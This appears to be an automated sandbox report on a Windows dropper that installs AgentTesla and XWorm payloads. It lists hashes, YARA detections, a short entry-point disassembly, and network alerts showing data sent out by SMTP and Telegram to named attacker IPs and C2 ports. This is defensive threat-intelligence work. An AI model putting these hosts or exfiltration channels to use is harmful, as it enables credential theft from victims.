                                                                                November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 149.154.167.220
                                                                                dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                TELEGRAMRU2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                                                • 149.154.167.220
                                                                                MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 149.154.167.220
                                                                                November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 149.154.167.220
                                                                                dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                CLOUDFLARENETUShttps://docs.zoom.us/doc/5mbYcD6lRBK5O3HcDEXhFA?from=emailGet hashmaliciousUnknownBrowse
                                                                                • 172.67.201.42
                                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.24.198
                                                                                3e5cb809-f546-fb3c-b0e3-5de228b453ab.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                https://click.pstmrk.it/3s/greatestannualeventsinamerica.com/19Hg/24i5AQ/AQ/00bfb018-90f5-4b99-8834-436dd88a4b16/1/pcsx-lhnFbGet hashmaliciousUnknownBrowse
                                                                                • 104.21.1.135
                                                                                AnuhIsNqBl.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.160.80
                                                                                3e5cb809-f546-fb3c-b0e3-5de228b453ab.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                oGjfUw6bZu.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.53.40
                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                • 104.21.111.0
                                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                • 104.26.0.231
                                                                                sjth8TLl4P.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.160.80
                                                                                VIVIDHOSTINGUSRef#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                • 162.254.34.31
                                                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 192.26.155.193
                                                                                Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                • 162.254.34.31
                                                                                Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                • 162.254.34.31
                                                                                BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                m68k.elfGet hashmaliciousUnknownBrowse
                                                                                • 64.190.116.37
                                                                                Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                TELEMEDIA-ASRO2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                • 89.40.31.232
                                                                                Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                • 89.40.31.232
                                                                                tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                                                • 89.40.31.232
                                                                                Dekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                • 89.40.31.232
                                                                                No. 1349240400713.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                • 89.40.31.232
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0e2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                https://go.dgdp.net/Get hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                http://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                idk_1.ps1Get hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                • 104.26.13.205
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeBooking_261.exeGet hashmaliciousAgentTesla, Clipboard HijackerBrowse
                                                                                  Process:C:\Users\user\Desktop\DJ5PhUwOsM.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):240128
                                                                                  Entropy (8bit):4.998082516808912
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:Z+2Lmlx1JlKiSBTxbBGiz64tlyz5X0JdYA4:Z+2Lmlx1JldSVxbBF643yOdx
                                                                                  MD5:A21DF2C0CCA131EB534F520FD641ADB5
                                                                                  SHA1:CD39E12E326191888B836C3419AC2CB71C2B5B11
                                                                                  SHA-256:FB247F5397BA1B2D9328D1ACC2FD322181A91CED1953853ABB41718DC21198AE
                                                                                  SHA-512:DEE53E8D4EEF995340308A7EF184217556DE7C0BA1F1B3FFE0937FE6EA0FBCFD5C3B09BDF8A937A6849B9A2401CB89A8A1C720668A6041E0738FCFA7DFE6AF02
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: ditekSHen
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: Booking_261.exe, Detection: malicious, Browse
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ef................................. ........@.. ....................................@.................................p...K.......F............................................................................ ............... ..H............text....... ...................... ..`.rsrc...F...........................@..@.reloc..............................@..B........................H...........0...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................
                                                                                  Process:C:\Users\user\Desktop\DJ5PhUwOsM.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):76800
                                                                                  Entropy (8bit):6.066050319145751
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:mj2knMmhKdS08aK+rgYkdQOV9bFejQ4HyLPnqo9OMwPvyia:mQTnDrGdQo9bFxYo9OtVa
                                                                                  MD5:068C99328320CAAA7C5F2D31B0FF214B
                                                                                  SHA1:E18B1E08E7F256602BE60E1D75B15C2C73284CA2
                                                                                  SHA-256:E9434C0BF7BE5E39CFAD4FE44BB996B09C1283DE5706A8721A33363080E9D016
                                                                                  SHA-512:A86C80A454C912F379C8077A1FCFFC5B79681E4DE7020FDA900E55A59566DFC5E11086695448CDD33659ED6E6E000A4A46009BE29FFA5A9EB3730014DE48AA18
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: ditekSHen
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Pk.g................."...........A... ...`....@.. ....................................@.................................lA..O....`............................................................................... ............... ..H............text....!... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................A......H........_..........&.....................................................(....*.r...p*. ..L.*..(....*.r5..p*. =...*.s.........s.........s.........s.........*.ri..p*. ..r.*.r...p*. ..M.*.r...p*. ....*.r...p*. ...*.r9..p*. .J..*..((...*.r...p*. ._..*.r...p*. ...*"(....+.*"(....+.*&(....&+.*.+5sA... .... .'..oB...(,...~....-.(J...(<...~....oC...&.-.*.rw..p*. *p{.*.r...p*. ..e.*.r...p*. .y.*.r...p*. 9...*.rG..p*. .&.*.r{..p*. .(T.*.r...p*. ....*..............j...............
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):5.231286300665583
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:DJ5PhUwOsM.exe
                                                                                  File size:335'872 bytes
                                                                                  MD5:d61526463472da19dd8869f484a8f4ef
                                                                                  SHA1:20514ac586fb6847057be18ecf00b84cda7e948f
                                                                                  SHA256:65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa
                                                                                  SHA512:925089713ea4877de9300c0998eabcef4850af08ea6e7a12704e92736928461e54a8fa8cb56c3c910ca334e5395a5497f38715237970f4f70532a26405cd3fee
                                                                                  SSDEEP:3072:7+2Lmlx1JlKiSBTxbBGiz64tlyz5X0JdYA4TQTnDrGdQo9bFxYo9OtVa2M:7+2Lmlx1JldSVxbBF643yOdxBDrGVbHR
                                                                                  TLSH:7C6472027F88EB11E1A93E3782EF2D2413B2B0C71633D20F6F499B6514516869D7EB6D
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.qhR.qhR.qhR..wX.zhR..t\.phR..wV.shR..g..thR.qhS.nhR..wY.shR..nT.phR.RichqhR.........................PE..L...)..P...........
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x401190
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:
                                                                                  Time Stamp:0x50CC1329 [Sat Dec 15 06:05:29 2012 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:009023b6b22e202aa54365d2270f6f95
                                                                                  Instruction
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push FFFFFFFFh
                                                                                  push 00402080h
                                                                                  push 00401310h
                                                                                  mov eax, dword ptr fs:[00000000h]
                                                                                  push eax
                                                                                  mov dword ptr fs:[00000000h], esp
                                                                                  sub esp, 68h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  mov dword ptr [ebp-18h], esp
                                                                                  xor ebx, ebx
                                                                                  mov dword ptr [ebp-04h], ebx
                                                                                  push 00000002h
                                                                                  call dword ptr [00402064h]
                                                                                  pop ecx
                                                                                  or dword ptr [00403040h], FFFFFFFFh
                                                                                  or dword ptr [00403044h], FFFFFFFFh
                                                                                  call dword ptr [00402060h]
                                                                                  mov ecx, dword ptr [0040303Ch]
                                                                                  mov dword ptr [eax], ecx
                                                                                  call dword ptr [0040205Ch]
                                                                                  mov ecx, dword ptr [00403038h]
                                                                                  mov dword ptr [eax], ecx
                                                                                  mov eax, dword ptr [00402058h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  mov dword ptr [00403048h], eax
                                                                                  call 00007FB600F1BD15h
                                                                                  cmp dword ptr [00403028h], ebx
                                                                                  jne 00007FB600F1BC0Eh
                                                                                  push 0040130Ch
                                                                                  call dword ptr [00402054h]
                                                                                  pop ecx
                                                                                  call 00007FB600F1BCE7h
                                                                                  push 0040300Ch
                                                                                  push 00403008h
                                                                                  call 00007FB600F1BCD2h
                                                                                  mov eax, dword ptr [00403034h]
                                                                                  mov dword ptr [ebp-6Ch], eax
                                                                                  lea eax, dword ptr [ebp-6Ch]
                                                                                  push eax
                                                                                  push dword ptr [00403030h]
                                                                                  lea eax, dword ptr [ebp-64h]
                                                                                  push eax
                                                                                  lea eax, dword ptr [ebp-70h]
                                                                                  push eax
                                                                                  lea eax, dword ptr [ebp-60h]
                                                                                  push eax
                                                                                  call dword ptr [0040204Ch]
                                                                                  push 00403004h
                                                                                  push 00403000h
                                                                                  call 00007FB600F1BC9Fh
                                                                                  Programming Language:
                                                                                  • [C++] VS98 (6.0) build 8168
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x208c0x50.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x4da08.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x80.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x31c0x10004379eb4853c8b1bb4513db50d6997472False0.1533203125data1.6095484668607238IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x20000x3360x10002f1aabb6617ff8136ed129a4721a87c8False0.117919921875data1.3419768456025012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x30000x4c0x10009a1067c760bc211bd6646c8feedced16False0.013671875data0.0503620825472891IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x40000x4da080x4e0006d0726a2060588cb9ecd9049b606796bFalse0.41466033153044873data5.38872769405723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_RCDATA0x40d00x3aa05PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.35672731361370574
                                                                                  RT_RCDATA0x3ead80x12c05PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.606536032810364
                                                                                  RT_VERSION0x516e00x328dataChineseChina0.4443069306930693
                                                                                  DLLImport
                                                                                  KERNEL32.dllExitProcess, FreeResource, CloseHandle, WriteFile, CreateFileA, MoveFileExA, GetTempFileNameA, GetTempPathA, LockResource, LoadResource, SizeofResource, FindResourceA, GetModuleHandleA, GetStartupInfoA
                                                                                  SHELL32.dllShellExecuteA
                                                                                  MSVCRT.dllsprintf, _exit, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp, _XcptFilter
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  ChineseChina
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-11-25T15:36:14.278202+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.549705162.254.34.31587TCP
                                                                                  2024-11-25T15:36:14.278202+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.549705162.254.34.31587TCP
                                                                                  2024-11-25T15:36:25.030421+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.549706149.154.167.220443TCP
                                                                                  2024-11-25T15:36:25.737135+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.549705162.254.34.31587TCP
                                                                                  2024-11-25T15:36:25.737135+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549705162.254.34.31587TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 25, 2024 15:36:19.151210070 CET49704443192.168.2.5104.26.13.205
                                                                                  Nov 25, 2024 15:36:19.151271105 CET44349704104.26.13.205192.168.2.5
                                                                                  Nov 25, 2024 15:36:19.151432037 CET49704443192.168.2.5104.26.13.205
                                                                                  Nov 25, 2024 15:36:19.158540010 CET49704443192.168.2.5104.26.13.205
                                                                                  Nov 25, 2024 15:36:19.158576965 CET44349704104.26.13.205192.168.2.5
                                                                                  Nov 25, 2024 15:36:20.489238024 CET44349704104.26.13.205192.168.2.5
                                                                                  Nov 25, 2024 15:36:20.493083000 CET49704443192.168.2.5104.26.13.205
                                                                                  Nov 25, 2024 15:36:20.545299053 CET49704443192.168.2.5104.26.13.205
                                                                                  Nov 25, 2024 15:36:20.545312881 CET44349704104.26.13.205192.168.2.5
                                                                                  Nov 25, 2024 15:36:20.545635939 CET44349704104.26.13.205192.168.2.5
                                                                                  Nov 25, 2024 15:36:20.590617895 CET49704443192.168.2.5104.26.13.205
                                                                                  Nov 25, 2024 15:36:20.758320093 CET49704443192.168.2.5104.26.13.205
                                                                                  Nov 25, 2024 15:36:20.803339958 CET44349704104.26.13.205192.168.2.5
                                                                                  Nov 25, 2024 15:36:21.120558977 CET44349704104.26.13.205192.168.2.5
                                                                                  Nov 25, 2024 15:36:21.120635986 CET44349704104.26.13.205192.168.2.5
                                                                                  Nov 25, 2024 15:36:21.120723009 CET49704443192.168.2.5104.26.13.205
                                                                                  Nov 25, 2024 15:36:21.131345987 CET49704443192.168.2.5104.26.13.205
                                                                                  Nov 25, 2024 15:36:21.749145985 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:22.034368038 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:22.036299944 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:22.827523947 CET49706443192.168.2.5149.154.167.220
                                                                                  Nov 25, 2024 15:36:22.827562094 CET44349706149.154.167.220192.168.2.5
                                                                                  Nov 25, 2024 15:36:22.827639103 CET49706443192.168.2.5149.154.167.220
                                                                                  Nov 25, 2024 15:36:22.844223976 CET49706443192.168.2.5149.154.167.220
                                                                                  Nov 25, 2024 15:36:22.844257116 CET44349706149.154.167.220192.168.2.5
                                                                                  Nov 25, 2024 15:36:23.238554955 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:23.273309946 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:23.435730934 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:23.694010019 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:23.694900036 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:23.875370026 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.136125088 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.137239933 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:24.279877901 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.444256067 CET44349706149.154.167.220192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.444350004 CET49706443192.168.2.5149.154.167.220
                                                                                  Nov 25, 2024 15:36:24.449929953 CET49706443192.168.2.5149.154.167.220
                                                                                  Nov 25, 2024 15:36:24.449937105 CET44349706149.154.167.220192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.450269938 CET44349706149.154.167.220192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.496922016 CET49706443192.168.2.5149.154.167.220
                                                                                  Nov 25, 2024 15:36:24.511181116 CET49706443192.168.2.5149.154.167.220
                                                                                  Nov 25, 2024 15:36:24.550875902 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.551141977 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:24.551332951 CET44349706149.154.167.220192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.683243036 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.947067022 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:24.947577953 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:25.030436039 CET44349706149.154.167.220192.168.2.5
                                                                                  Nov 25, 2024 15:36:25.030504942 CET44349706149.154.167.220192.168.2.5
                                                                                  Nov 25, 2024 15:36:25.030584097 CET49706443192.168.2.5149.154.167.220
                                                                                  Nov 25, 2024 15:36:25.043129921 CET49706443192.168.2.5149.154.167.220
                                                                                  Nov 25, 2024 15:36:25.079375982 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:25.342144012 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:25.342322111 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:25.475276947 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:25.736237049 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:25.737077951 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:25.737134933 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:25.737174034 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:25.737209082 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:25.885725975 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:25.885746956 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:25.885756016 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:25.885771036 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:26.256926060 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:36:26.309386015 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:36:29.351111889 CET497071717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:29.507122040 CET17174970789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:36:29.507253885 CET497071717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:29.598382950 CET497071717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:29.750399113 CET17174970789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:36:40.269285917 CET497071717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:40.398169994 CET17174970789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:36:50.904160023 CET497071717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:51.066288948 CET17174970789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:36:51.493657112 CET17174970789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:36:51.493819952 CET497071717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:53.887659073 CET497071717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:53.889051914 CET497531717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:54.015647888 CET17174970789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:36:54.018667936 CET17174975389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:36:54.018773079 CET497531717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:54.036510944 CET497531717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:36:54.170738935 CET17174975389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:04.153536081 CET497531717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:04.289515972 CET17174975389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:14.282002926 CET497531717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:14.409111977 CET17174975389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:15.947592020 CET17174975389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:15.947707891 CET497531717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:17.981745958 CET497531717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:17.983418941 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:18.109812021 CET17174975389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:18.120250940 CET17174980689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:18.122641087 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:18.144352913 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:18.272723913 CET17174980689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:30.356631994 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:30.482741117 CET17174980689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:31.575370073 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:31.700321913 CET17174980689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:36.466365099 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:36.586472034 CET17174980689.40.31.232192.168.2.5
